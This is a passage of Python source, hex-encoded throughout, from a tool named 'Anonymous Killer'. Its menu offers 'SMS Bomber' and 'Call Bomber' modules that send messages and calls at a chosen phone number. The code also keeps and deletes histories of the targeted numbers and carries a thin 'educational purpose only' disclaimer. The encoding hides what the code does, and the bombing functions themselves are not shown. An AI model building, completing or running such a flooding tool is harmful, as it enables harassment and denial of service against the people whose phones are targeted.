70\x6f\x73\x65\x73\x20\x6f\x6e\x6c\x79\x3f\x20\x7b\x35\x7d\x28\x7b\x33\x7d\x59\x7b\x35\x7d\x2f\x7b\x30\x7d\x4e\x7b\x35\x7d\x29\x5c\x6e\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x27\x59\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x35\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72
\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x7b\x30\x7d\x59\x4f\x55\x20\x41\x52\x45\x20\x4e\x4f\x54\x20\x41\x55\x54\x48\x4f\x52\x49\x5a\x45\x44\x20\x54\x4f\x20\x55\x53\x45\x20\x54\x48\x49\x53\x20\x54\x4f\x4f\x4c\x2e\x59\x4f\x55\x20\x43\x41\x4e\x20\x4f\x4e\x4c\x59\x20\x55\x53\x45\x20\x49\x54\x20\x46\x4f\x52\x20\x45\x44\x55\x43\x41\x54\x49\x4f\x4e\x41\x4c\x20\x50\x55\x52\x50\x4f\x53\x45\x2e\x21\x20\x5d\x7b\x34\x7d\x5c\x6e\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x5f\x62\x61\x6e\x6e\x65\x72\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6c\x6f\x67\x6f\x0a\x20\x20\x20\x20\x41\x61\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x31\x6d\x27\x0a\x20\x20\x20\x20\x42\x62\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x32\x6d\x27\x0a\x20\x20\x20\x20\x43\x63\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x33\x6d\x27\x0a\x20\x20\x20\x20\x44\x64\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x34\x6d\x27\x0a\x20\x20\x20\x20\x45\x65\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x35\x6d\x27\x0a\x20\x20\x20\x20\x46\x66\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x36\x6d\x27\x0a\x20\x20\x20\x20\x78\x58\x3d\x28\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x5b\x41\x61\x2c\x42\x62\x2c\x43\x63\x2c\x44\x64\x2c\x45\x65\x2c\x46\x66\x5d\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x20\x28\x22\x7b\x30\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x78\x58\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x65\x63\x68\x6f\x20\x22\x5c\x74\x5c\x74\x57\x65\x6c\x63\x6f\x6d\x65\x20\x54\x6f\x20\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x20\x4b\x69\x6c\x6c\x65\x72\x20\x3a\x29\x22\x20\x7c\x20\x62\x6f\x78\x65\x73
\x20\x2d\x64\x20\x62\x6f\x79\x27\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x20\x28\x22\x7b\x30\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x44\x45\x46\x41\x55\x4c\x54\x20\x29\x29\x0a\x20\x20\x20\x20\x0a\x64\x65\x66\x20\x72\x65\x6d\x73\x70\x28\x6e\x75\x6d\x29\x3a\x0a\x20\x20\x20\x20\x6e\x75\x6d\x20\x3d\x20\x6e\x75\x6d\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x20\x27\x2c\x20\x27\x27\x29\x0a\x20\x20\x20\x20\x6e\x75\x6d\x20\x3d\x20\x6e\x75\x6d\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x2d\x27\x2c\x20\x27\x27\x29\x0a\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x6e\x75\x6d\x0a\x0a\x64\x65\x66\x20\x6e\x65\x74\x28\x29\x3a\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x6c\x65\x61\x72\x27\x29\x0a\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x20\x20\x20\x20\x6d\x20\x3d\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x77\x67\x65\x74\x20\x2d\x71\x20\x2d\x2d\x73\x70\x69\x64\x65\x72\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x27\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6d\x20\x3d\x3d\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x23\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x54\x75\x72\x6e\x20\x6f\x6e\x20\x79\x6f\x75\x72\x20\x69\x6e\x74\x65\x72\x6e\x65\x74\x20\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x5c\x6e\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x20\x59\x45\x4c\x4c\x4f\x57\x20\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x69\x6e\x73\x74\x61\x6c\x6c\x5f\x74\x6f\x6f\x6c\x73\x28\x29\x3a\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x32\x7d\x5b\x7b\x30\x7d\x3e\x7b\x32\x7d\x5d\x7b\x30\x7d\x49\x6e\x73\x74\x61\x6c\x6c\x69\x6e\x67\x20\x52\x65\x71\x75\x69\x72\x65\x6d\x65\x6e
\x74\x73\x2e\x2e\x2e\x2e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x61\x70\x74\x20\x69\x6e\x73\x74\x61\x6c\x6c\x20\x70\x79\x74\x68\x6f\x6e\x20\x63\x75\x72\x6c\x20\x2d\x79\x22\x29\x23\x66\x69\x67\x6c\x65\x74\x20\x74\x6f\x69\x6c\x65\x74\x20\x62\x6f\x78\x65\x73\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x61\x70\x74\x20\x69\x6e\x73\x74\x61\x6c\x6c\x20\x70\x79\x74\x68\x6f\x6e\x33\x2d\x70\x69\x70\x22\x29\x0a\x20\x20\x20\x20\x66\x20\x3d\x20\x6f\x70\x65\x6e\x28\x22\x6c\x6f\x76\x65\x22\x2c\x20\x22\x77\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x77\x72\x69\x74\x65\x28\x22\x5c\x74\x5c\x74\x75\x20\x6c\x6f\x6f\x6b\x20\x73\x6f\x20\x62\x65\x61\x75\x74\x69\x66\x75\x6c\x20\x3a\x29\x5c\x6e\x5c\x6e\x74\x68\x69\x73\x20\x69\x73\x20\x63\x72\x65\x61\x74\x20\x62\x79\x20\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x43\x6f\x6e\x74\x69\x6e\x75\x65\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x0a\x64\x65\x66\x20\x63\x68\x65\x63\x6b\x5f\x74\x6f\x6f\x6c\x28\x29\x3a\x0a\x20\x20\x20\x20\x69\x66\x20\x70\x61\x74\x68\x2e\x69\x73\x66\x69\x6c\x65\x28\x27\x6c\x6f\x76\x65\x27
\x29\x20\x3d\x3d\x20\x46\x61\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x73\x74\x61\x6c\x6c\x5f\x74\x6f\x6f\x6c\x73\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x41\x6c\x6c\x20\x52\x65\x71\x75\x69\x72\x65\x6d\x65\x6e\x74\x73\x20\x46\x6f\x75\x6e\x64\x2e\x2e\x2e\x2e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x4d\x41\x49\x4e\x20\x4d\x45\x4e\x55\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x3a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x67\x6c
\x6f\x62\x61\x6c\x20\x6d\x6f\x64\x75\x6c\x65\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x20\x53\x45\x4c\x45\x43\x54\x20\x41\x4e\x59\x20\x4d\x4f\x44\x55\x4c\x45\x20\x21\x21\x7b\x30\x7d\x5d\x20\x5c\x6e\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x31\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x53\x4d\x53\x20\x42\x6f\x6d\x62\x65\x72\x20\x7b\x34\x7d\x20\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x32\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x43\x61\x6c\x6c\x20\x42\x6f\x6d\x62\x65\x72\x7b\x34\x7d\x20\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x33\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x48\x69\x73\x74\x6f\x72\x79\x20\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x34\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x45\x78\x69\x74\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x31\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x73\x6d\x73\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x20\x3d\x20\x5b\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x5d\x23\x31\x30\x30\x2c\x31\x30\x31\x2c\x31\x30\x32\x2c\x31\x30\x33\x2c\x31\x30\x34\x2c\x31\x30\x36\x20\x20\x23\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6d\x73\x5f\x66\x69\x72\x65\x28\x70\x6e\x2c\x20\x6e\x6d\x2c\x20\x64\x6c\x2c\x20\x63\x68\x2c\x20\x73\x74\x72\x28\x63\x63\x29\x29\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x32\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x63\x61\x6c\x6c\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x20\x3d\x20\x5b\x31\x30\x30\x2c\x20\x31\x30\x31\x2c\x20\x31\x30\x32\x2c\x20\x31\x30\x33\x2c\x20\x31\x30\x34\x2c\x20\x31\x30\x36\x5d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x61\x6c\x6c\x5f\x66\x69\x72\x65\x28\x70\x6e\x2c\x20\x6e\x6d\x2c\x20\x64\x6c\x2c\x20\x63\x68\x2c\x20\x73\x74\x72\x28\x63\x63\x29\x29\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x33\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x20\x53\x45\x4c\x45\x43\x54\x20\x41\x4e\x59\x20\x4d\x4f\x44\x55\x4c\x45\x20\x21\x21\x7b\x30\x7d\x5d\x20\x5c\x6e\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20
\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x31\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x53\x4d\x53\x20\x48\x69\x73\x74\x6f\x72\x79\x20\x5c\x6e\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x32\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x43\x61\x6c\x6c\x20\x48\x69\x73\x74\x6f\x72\x79\x5c\x6e\x7b\x30\x7d\x5b\x7b\x35\x7d\x33\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x54\x6f\x20\x44\x65\x6c\x65\x74\x65\x20\x48\x69\x73\x74\x6f\x72\x79\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x61\x71\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x61\x71\x20\x3d\x3d\x20\x22\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x61\x74\x20\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c
\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x61\x71\x20\x3d\x3d\x20\x22\x32\x22\x20\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x61\x74\x20\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x61\x71\x20\x3d\x3d\x20\x22\x33\x22\x20\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x20\x53\x45\x4c\x45\x43\x54\x20\x41\x4e\x59\x20\x4d\x4f\x44\x55\x4c\x45\x20\x21\x21\x7b\x30\x7d\x5d\x20\x5c\x6e\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d
\x2d\x2d\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x31\x7b\x30\x7d\x5d\x7b\x32\x7d\x44\x65\x6c\x65\x74\x65\x20\x53\x4d\x53\x20\x48\x69\x73\x74\x6f\x72\x79\x20\x5c\x6e\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x32\x7b\x30\x7d\x5d\x7b\x32\x7d\x44\x65\x6c\x65\x74\x65\x20\x43\x61\x6c\x6c\x20\x48\x69\x73\x74\x6f\x72\x79\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x6d\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x61\x6d\x20\x3d\x3d\x20\x22\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20